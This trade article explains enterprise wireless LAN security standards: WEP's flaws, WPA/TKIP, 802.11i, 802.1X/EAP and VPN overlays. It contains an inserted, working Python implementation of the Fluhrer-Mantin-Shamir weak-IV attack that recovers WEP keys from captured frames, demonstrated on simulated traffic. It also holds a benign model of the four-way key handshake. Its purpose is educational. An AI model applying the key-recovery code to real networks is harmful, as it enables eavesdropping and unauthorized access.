Making Sense of Evolving WLAN Standards, Part 1: Security

By Jeff Vance


Considering that Wi-Fi started out as a home networking technology, is it any surprise that network managers are confused about how to deploy enterprise-grade wireless LANs?

Recent studies from market research firms such as IDC and ForceNine Consulting show that while there is a good deal of optimism concerning the future ubiquity of WLANs in the corporate world, large deployments are still predominantly limited to the vertical markets of health care and education. To make matters worse, as the industry begins to standardize on enterprise-class protocols, the very standards promising to bring order to wireless are adding to the confusion because they are continually in flux.

"It's important to remember that the wireless LAN enterprise market is just now reaching the phase of broad market adoption," said Paul DeBeasi, vice president of Marketing at WLAN switch vendor Legra Systems. "To build an enterprise-class WLAN, you have to start with traditional networking technology and integrate that with both radio and security technology. Of course, there are standards for all three of these, but can you be sure that they will all work well together? For customers, the key issue isn't deciding which of the various protocols are best, so much as figuring out how they'll go about integrating them all."

Why Are Enterprises so Skittish?

ForceNine recently polled 50+ CIOs to analyze WLAN momentum in the U.S. corporate market. They found that there are a number of barriers to WLAN adoption in the enterprise, including concerns about cost, interoperability, standards, and security. "While enterprise CIOs have a number of worries when it comes to wireless, their number one concern, overwhelmingly, centers on security," said Dr. Sam Book, a partner at ForceNine.

Since security was a much lower concern in the home market, encryption and authentication were initially given a low priority. Now, as WLANs are poised to take over the enterprise market, their lack of enterprise-class capabilities is slowing them down a bit. Because of the early problems of WEP, whose reliance on static keys and a flawed use of the RC4 stream cipher let eavesdroppers recover the key from captured traffic, WLAN vendors are being forced to re-evangelize the advantages of mobility while assuring potential customers that those highly publicized security flaws have gone away.

"Many potential enterprise customers still have a WEP-centric view of the WLAN world," Book noted. "They don't yet understand that the security problems of WEP have been addressed with new and better protocols such as WPA and the forthcoming 802.11i."

"The problems associated with WEP clearly set the industry back," DeBeasi concurred. "There's no question about that. What's being overlooked, however, is the fact that WLAN technology is moving through a period of rapid innovation, and we're getting closer and closer to making the wireless LAN experience more like that of a wired LAN. Once you achieve a reasonable level of wireless dependability, which I would argue is happening as we speak, the benefits of mobility hit a tipping point, far outweighing outdated security worries."

The initial WLAN security protocol, WEP (Wired Equivalent Privacy), seeded its RC4 stream cipher with a static shared key prefixed by a 24-bit initialization vector (IV) that is sent in the clear with every frame. Because the key never changes and RC4's key scheduling leaks information about the key for certain IV values, an eavesdropper who captures enough frames carrying those "weak" IVs can recover the key and decrypt all traffic. Once enterprising hackers discovered this flaw, they developed automated cracking programs such as WEPCrack and AirSnort, which soon hit the Internet and gave even unsophisticated hackers the tools they needed to crack just about any WEP-based WLAN.
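To make that attack concrete, here is an added worked example (not code from the article, and not the code of WEPCrack or AirSnort): a toy WEP encryptor together with a simulation of the Fluhrer-Mantin-Shamir "weak IV" attack those tools implemented. The captured frames are constructed in the script itself, and the static key and MAC-layer details are arbitrary; the only property borrowed from the real protocol is that every 802.11 data frame begins with the same LLC/SNAP header, so the first plaintext bytes of every frame are known to the eavesdropper.

```python
"""
Added example, not code from the article: a toy WEP encryptor and a
simulation of the Fluhrer-Mantin-Shamir (FMS) weak-IV attack that tools
such as WEPCrack and AirSnort automated.  The capture is constructed
in-script; only the first four ciphertext bytes of each frame are kept,
because the matching plaintext (the LLC/SNAP header) is known.
"""
import os

# Every WEP-encrypted 802.11 data frame starts with the LLC/SNAP header,
# so the eavesdropper knows the first plaintext bytes of every frame.
SNAP_HEADER = bytes([0xAA, 0xAA, 0x03, 0x00])


def rc4_ksa(key, steps=256):
    """RC4 key scheduling, stopped after `steps` rounds so the attacker can
    replay just the rounds whose key bytes (IV + recovered bytes) it knows.
    Returns the state table S and the running index j."""
    S = list(range(256))
    j = 0
    for i in range(steps):
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    return S, j


def rc4_keystream(key, n):
    """Full RC4: key schedule followed by the first n PRGA output bytes."""
    S, _ = rc4_ksa(key)
    i = j = 0
    out = bytearray()
    for _ in range(n):
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(S[(S[i] + S[j]) & 0xFF])
    return bytes(out)


def wep_encrypt(static_key, iv, plaintext):
    """WEP seeds RC4 with IV || static key; the IV travels in the clear."""
    ks = rc4_keystream(iv + static_key, len(plaintext))
    return bytes(p ^ k for p, k in zip(plaintext, ks))


def capture_weak_iv_frames(static_key):
    """Constructed capture: one frame per FMS weak IV of the form
    (A+3, 255, X).  An AP whose IV counter simply increments emits every
    one of these eventually; AirSnort just waited for them."""
    frames = []
    for a in range(len(static_key)):
        for x in range(256):
            iv = bytes([a + 3, 255, x])
            frames.append((iv, wep_encrypt(static_key, iv, SNAP_HEADER)))
    return frames


def fms_votes(frames, known_prefix):
    """Vote for the next secret key byte, given the bytes recovered so far."""
    a = len(known_prefix)
    votes = [0] * 256
    for iv, ct in frames:
        if iv[0] != a + 3 or iv[1] != 255:
            continue
        # Replay the first a+3 KSA rounds with the key bytes we know.
        S, j = rc4_ksa(iv + known_prefix, a + 3)
        # "Resolved" condition: if S[0], S[1] and S[a+3] survive the remaining
        # rounds untouched (about 5% of the time), the first keystream byte
        # equals S[j'] with j' = j + S[a+3] + K[a+3], which reveals K[a+3].
        if S[1] >= a + 3 or (S[1] + S[S[1]]) & 0xFF != a + 3:
            continue
        out0 = ct[0] ^ SNAP_HEADER[0]          # first keystream byte
        votes[(S.index(out0) - j - S[a + 3]) & 0xFF] += 1
    return votes


def fms_recover_key(frames, key_len, candidates=5):
    """Depth-first search over the top-voted candidates for each byte; a
    full candidate key is verified against a captured frame, as real
    crackers do, so an occasional wrong vote does not derail the attack."""
    iv0, ct0 = frames[0]

    def search(prefix):
        if len(prefix) == key_len:
            return prefix if wep_encrypt(prefix, iv0, SNAP_HEADER) == ct0 else None
        votes = fms_votes(frames, prefix)
        for b in sorted(range(256), key=lambda v: -votes[v])[:candidates]:
            found = search(prefix + bytes([b]))
            if found is not None:
                return found
        return None

    return search(b"")


if __name__ == "__main__":
    key = os.urandom(5)                     # 40-bit WEP key, hidden from the attacker
    frames = capture_weak_iv_frames(key)    # 1,280 short frames
    print("recovered", fms_recover_key(frames, 5).hex(), "actual", key.hex())
```

Run as written, the script recovers a random 40-bit key from 1,280 frames; a 104-bit key only needs weak IVs from (3, 255, X) through (15, 255, X). The point to take away is that the attack needs no brute force at all, only patience: a hardware IV counter hands the eavesdropper every weak IV in turn, which is why the remedy in WPA/TKIP was per-packet key mixing and a 48-bit sequence counter rather than simply longer keys.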

Wired Versus Wireless Security

This bad-security timeline is by no means unique to wireless networks. If you recall the Denial of Service (DoS) attacks on major Web sites of a few years ago, that security story unfolded in a very similar fashion. DoS attacks were so easily executed that barely literate script kiddies were able to bring down the sites. Now programs like AirSnort have given rise to the new "war-driving" phenomenon, with unsophisticated crackers driving around looking for WLAN networks to break into ("true" wardrivers would argue they don't break into open networks; they catalog open access points to bring attention to WLAN security needs).

Whether they're broken into or not, discovering open access is generally a simple matter since many WLAN deployments leave both encryption and authentication features turned off -- the equivalent of leaving your car doors unlocked and the keys in the ignition.

Giving credit where credit is due, the WLAN industry moved quickly to address the problems of WEP, responding with a more robust encryption scheme, Wi-Fi Protected Access (WPA), which the Wi-Fi Alliance released in October 2002. WPA retains the RC4 cipher of WEP so that existing hardware can be upgraded in firmware, but it eliminates the static key: Temporal Key Integrity Protocol (TKIP) establishes a fresh session key with each client, mixes it into a different key for every packet, replaces WEP's 24-bit IV with a 48-bit sequence counter that also blocks replay, and adds a keyed message integrity check (Michael) that WEP's CRC-32 checksum could not provide.

WPA is only an interim measure, a pared-down subset of the pending 802.11i standard: it adopts 802.11i's TKIP and 802.1X-based key management but not the AES-based CCMP cipher that 802.11i mandates and that requires new hardware.

When asked when 802.11i will be available, Dave Juitt, CTO and chief security architect at Bluesocket, said: "Let me give you a wise-guy answer. 802.11i is due out in early 2003."

If 802.11i is long overdue even though the technology is ready, has approving new wireless encryption standards become a political rather than a technical issue?

"At this point, I'm not sure if it's political or just bureaucratic," Juitt said.

As of now, 802.11i is still winding its way through the cumbersome IEEE (Institute of Electrical and Electronics Engineers) ratification process, although some vendors claim to have 802.11i equipment already available. Without 802.11i being standardized, though, there's no way to know whether or not this gear will comply completely with the eventual ratified version.

According to Legra's DeBeasi, network security by no means ends with OSI Layer 2 encryption. For WLANs, that's just the basic foundation. User authentication is also a critical component of WLAN security, and it was one of the gaps in WEP.

Standards Can't Plug Every Security Hole

It's important to distinguish here between what vendors should be responsible for and where customer accountability comes in. Remember, many of the crackable WLANs out there are easily cracked because encryption and authentication of any flavor are turned off. You can't blame the bank-vault manufacturer if the bank manager never locks the vault because he doesn't want to bother memorizing the combination.

Even so, because of the hysteria surrounding wireless security, vendors are addressing the lazy-bank-manager problem by centralizing security into the core of the network, moving it away from access points and into a single, centralized appliance, such as a WLAN switch.

However, then you have yet another problem: your APs may have enough information in them to put your network at risk.

"Access points are inherently vulnerable because they are not physically secure. A savvy hacker or a smart disgruntled employee could guess the AP password and modify security settings to allow open network access," DeBeasi said. "A switch raises the bar because it requires more sophisticated control protocols such as SNMP version 3."

Bluesocket's Juitt says, "Both WPA and 802.11i should provide reasonable Layer 2 security, but any security professional with an ounce of sense will tell you that secure networks, be they wired or wireless, are based on a layered security architecture. You begin with the underlying Layer 2 protocols and build up from there. In some deployments, a Layer 2 solution is enough. In others, you may want to add Layer 3 security, perhaps IPSec, on top of that."

A common method for strengthening WLANs beyond Layer 2 encryption is to reuse an existing wired standard such as IPSec and run virtual private network (VPN) tunnels over the WLAN. However, VPNs are notorious for being complex and management-intensive. Moreover, because a VPN protects traffic only from Layer 3 up, the WLAN itself remains exposed to Layer 2 attacks: any node must be granted Layer 2 access before the tunnel can even be set up. With the data link unprotected, an attacker can see MAC addresses, associate with access points, and obtain an IP address from the Dynamic Host Configuration Protocol (DHCP) server, all before ever touching the VPN gateway. Much of the problem stems from the fact that IPSec was designed to protect traffic between two endpoints, while a WLAN is a shared broadcast medium on which the link itself needs to be controlled.

In contrast to IPSec, both WPA and 802.11i encrypt traffic and enforce user authentication at Layer 2 using IEEE 802.1X port-based access control. 802.1X carries EAP (Extensible Authentication Protocol), which makes it possible to authenticate users centrally and to establish a fresh session key for each client. EAP packets travel over the WLAN at the MAC layer (as EAPOL frames) and are forwarded by the WLAN switch or AP to the RADIUS server; until the server accepts the client, the port passes nothing but EAPOL. 802.1X also enables centralized policy control, so session time-outs can be enforced and automatic rekeying can be mandated.
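As an added illustration (not code from the article or from any vendor's product), the following Python models what happens after the RADIUS server accepts the client: the Pairwise Master Key (PMK) that the EAP exchange leaves on both sides is expanded by the 802.11i PRF into the per-session Pairwise Transient Key (PTK), and the EAPOL-Key four-way handshake proves that both sides hold it without ever sending the key over the air. It is also the "dynamic rekeying" that the WPA/TKIP discussion above contrasts with WEP's static key. Assumptions: the PMK is a constructed random value standing in for the key a RADIUS server would hand the AP, the MAC addresses are arbitrary, and the EAPOL-Key frame is reduced to the fields the MIC covers.

```python
"""
Added example, not code from the article or any vendor: how WPA/802.11i
turn the master key from 802.1X/EAP into per-session keys, modelled as the
EAPOL-Key four-way handshake between an AP (authenticator) and a client
(supplicant).  The PMK and MAC addresses are constructed values, and the
EAPOL-Key frame is simplified to the fields the MIC is computed over.
"""
import hashlib
import hmac
import os


def prf(key, label, data, nbits):
    """802.11i PRF-n: HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ...
    concatenated and truncated to nbits."""
    out = b""
    for i in range((nbits + 159) // 160):
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
    return out[: nbits // 8]


def derive_ptk(pmk, aa, spa, anonce, snonce, cipher="TKIP"):
    """PTK = PRF-X(PMK, "Pairwise key expansion", Min(AA,SPA) || Max(AA,SPA) ||
    Min(ANonce,SNonce) || Max(ANonce,SNonce)); X is 512 for TKIP, 384 for CCMP."""
    nbits = 512 if cipher == "TKIP" else 384
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    ptk = prf(pmk, b"Pairwise key expansion", data, nbits)
    # KCK authenticates handshake frames, KEK wraps the group key, TK encrypts data.
    return {"KCK": ptk[:16], "KEK": ptk[16:32], "TK": ptk[32:]}


def eapol_key_mic(kck, frame_without_mic, cipher="TKIP"):
    """Key-descriptor version 1 (TKIP) uses HMAC-MD5, version 2 (CCMP) uses
    HMAC-SHA1 truncated to 128 bits; the MIC field is zero while computing it."""
    h = hashlib.md5 if cipher == "TKIP" else hashlib.sha1
    return hmac.new(kck, frame_without_mic, h).digest()[:16]


def frame(replay_counter, nonce, payload=b""):
    """Simplified EAPOL-Key body: 8-byte replay counter || 32-byte nonce || payload."""
    return replay_counter.to_bytes(8, "big") + nonce + payload


class Authenticator:
    def __init__(self, pmk, aa, cipher="TKIP"):
        self.pmk, self.aa, self.cipher = pmk, aa, cipher
        self.anonce = os.urandom(32)
        self.ptk = None

    def message1(self):                      # ANonce in the clear, no MIC yet
        return frame(1, self.anonce)

    def message3(self, spa, msg2, mic2):
        snonce = msg2[8:40]
        ptk = derive_ptk(self.pmk, self.aa, spa, self.anonce, snonce, self.cipher)
        if not hmac.compare_digest(eapol_key_mic(ptk["KCK"], msg2, self.cipher), mic2):
            return None                      # client lacks the PMK: no keys installed
        self.ptk = ptk
        m3 = frame(2, self.anonce, b"install")   # real frames carry the KEK-wrapped GTK here
        return m3, eapol_key_mic(ptk["KCK"], m3, self.cipher)

    def finish(self, msg4, mic4):
        return hmac.compare_digest(eapol_key_mic(self.ptk["KCK"], msg4, self.cipher), mic4)


class Supplicant:
    def __init__(self, pmk, spa, cipher="TKIP"):
        self.pmk, self.spa, self.cipher = pmk, spa, cipher
        self.snonce = os.urandom(32)
        self.ptk = None

    def message2(self, aa, msg1):
        anonce = msg1[8:40]
        self.ptk = derive_ptk(self.pmk, aa, self.spa, anonce, self.snonce, self.cipher)
        m2 = frame(1, self.snonce)
        return m2, eapol_key_mic(self.ptk["KCK"], m2, self.cipher)

    def message4(self, msg3, mic3):
        if not hmac.compare_digest(eapol_key_mic(self.ptk["KCK"], msg3, self.cipher), mic3):
            return None                      # forged AP or mismatched PMK
        m4 = frame(2, b"\x00" * 32)
        return m4, eapol_key_mic(self.ptk["KCK"], m4, self.cipher)


def four_way_handshake(ap_pmk, client_pmk, cipher="TKIP"):
    """Run the exchange; returns (success, TK at the AP, TK at the client)."""
    aa, spa = bytes.fromhex("001122334455"), bytes.fromhex("66778899aabb")  # constructed MACs
    ap, sta = Authenticator(ap_pmk, aa, cipher), Supplicant(client_pmk, spa, cipher)
    m2, mic2 = sta.message2(aa, ap.message1())
    step3 = ap.message3(spa, m2, mic2)
    if step3 is None:
        return False, None, None
    step4 = sta.message4(*step3)
    if step4 is None:
        return False, None, None
    return ap.finish(*step4), ap.ptk["TK"], sta.ptk["TK"]


if __name__ == "__main__":
    pmk = os.urandom(32)   # constructed; under 802.1X it is the first 256 bits of the EAP MSK
    ok, tk_ap, tk_sta = four_way_handshake(pmk, pmk)
    print("handshake ok:", ok, "| same TK:", tk_ap == tk_sta, "| TK:", tk_ap.hex())
    print("client with wrong PMK accepted:", four_way_handshake(pmk, os.urandom(32))[0])
```

Everything an eavesdropper sees in this exchange (both MAC addresses, both nonces, the MICs) is public, yet without the PMK the PTK cannot be reproduced, and a client that presents the wrong PMK is rejected at message 2 before any key is installed. Because the nonces change on every association, the data-encryption key TK is fresh each session, which is exactly the rekeying WEP never had.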

Security Is a Moving Target

This whole issue of strong-enough WLAN security standards reminds me of several conversations I've had with security guru Bruce Schneier, founder and CTO of Counterpane Internet Security and author of several books on security, including Secrets & Lies: Digital Security in a Networked World. You can't have a conversation with Schneier without hearing two security refrains repeated over and over: "Security is a process, not a product," and "Security is a moving target." In other words, there is human intelligence involved with any type of network attack, so those attacks constantly evolve. Products can address known vulnerabilities, but they tend to be blindsided by innovative attack methods.

While it would be foolish to believe that wireless security issues will ever be solved, I have noticed lately that my discussions about WLAN security are strikingly similar to the conversations I was having a couple of years ago about wired Internet security. In other words, the security gap between the two is rapidly closing (you could argue it has closed already). Instead of worrying about security holes you can drive a truck through (like WEP), the industry is beginning to worry about more savvy, creative, and sophisticated security issues. If you have an 802.11i- or WPA-compliant WLAN that centralizes authentication and policy procedures, then wireless security is no longer an issue of wireless security, but simply of network security.

(Part Two of this article will investigate the issues that arise once security concerns have been taken off the table. Which version of radio technology should you commit to -- 802.11a, b, or g? And once the client-to-radio communication is addressed, how then should your radios communicate back to your centralized WLAN appliance?)

Jeff Vance is a technology writer and consultant. He was previously the editor of Mobile Internet Times and E-Infrastructure Times, before striking out as a freelance writer. He now focuses on high-tech trends in wireless, next-generation networking, and Internet infrastructure. His articles have appeared or are forthcoming in Network World, Wi-Fi Planet, DeviceTop.com, SearchNetworking.com, and Telecom Trends, among others. You can contact him at mjwvance@zoomInternet.net.